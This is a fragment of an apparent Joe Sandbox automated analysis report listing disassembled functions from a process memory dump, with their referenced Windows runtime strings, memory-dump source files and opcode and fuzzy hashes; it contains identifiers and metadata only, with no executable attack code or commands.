                                                              • Opcode ID: 0a2a77a8ba5960bf0b972a08ceefabe223d2db0da6bb738dfb5676c4d1245c44
                                                              • Instruction ID: 797ed8641aeabc7f12a5b9ae038884da1021e2e3130471d3972d8110c5ab4b6b
                                                              • Opcode Fuzzy Hash: 0a2a77a8ba5960bf0b972a08ceefabe223d2db0da6bb738dfb5676c4d1245c44
                                                              • Instruction Fuzzy Hash: DE41D3317007029FDB28DE25CC40B6AB7E5EF89724F111A1DF95ADB690EB71F4068B91
                                                              Function 04EDB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F1728C
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 04F172C1
                                                              • RTL: Resource at %p, xrefs: 04F172A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04F17294
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 3bc0d321831f51ed6da2d099f1202aa11a42d0270405ea67bc0c9bfa7fb226a5
                                                              • Instruction ID: 97fa85842d89a74ace4230a37bd34ce07d6e070cba0923af35cf000c5c0ede6d
                                                              • Opcode Fuzzy Hash: 3bc0d321831f51ed6da2d099f1202aa11a42d0270405ea67bc0c9bfa7fb226a5
                                                              • Instruction Fuzzy Hash: 3E41D231B00242AFD724EE25CC41B6AB7E5FF44714F101619F959EB290EB21F8439BD1
                                                              Function 04F52300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: f46a5f131e43d5f29ed30b8509dc58321a8abf5f96b20263585a83d6b67dc635
                                                              • Instruction ID: 34bc75a542b0d5bb05135b3cdd3a12724a66e6ff1a84ab242924185462845f3d
                                                              • Opcode Fuzzy Hash: f46a5f131e43d5f29ed30b8509dc58321a8abf5f96b20263585a83d6b67dc635
                                                              • Instruction Fuzzy Hash: 6F316672A002199FDB20DF29DC40BEE77F8EB44714F454595ED49E3240EB30BA498FA1
                                                              Function 04EE7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 108f2ac2560e347d577dee1698237034030c94758f869d67a7c613395627e860
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 87919170E002169BEF24DF6BC881ABEB7A5FF44728F14651AE855E72D4E730A941C760
                                                              Function 04EA9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 01eebf7be2c4de160e7a0981a6f3e43f59edc65cd27f2b998d1efb5a24812572
                                                              • Instruction ID: 87003e63076aca90381ec86345b97f9fe48d573dbccd06a3d62ae95a92dfe40b
                                                              • Opcode Fuzzy Hash: 01eebf7be2c4de160e7a0981a6f3e43f59edc65cd27f2b998d1efb5a24812572
                                                              • Instruction Fuzzy Hash: CE812EB1D002699BDB35CF54CD44BEAB7B4AF44714F0145EAE909B7280E730AE85DFA0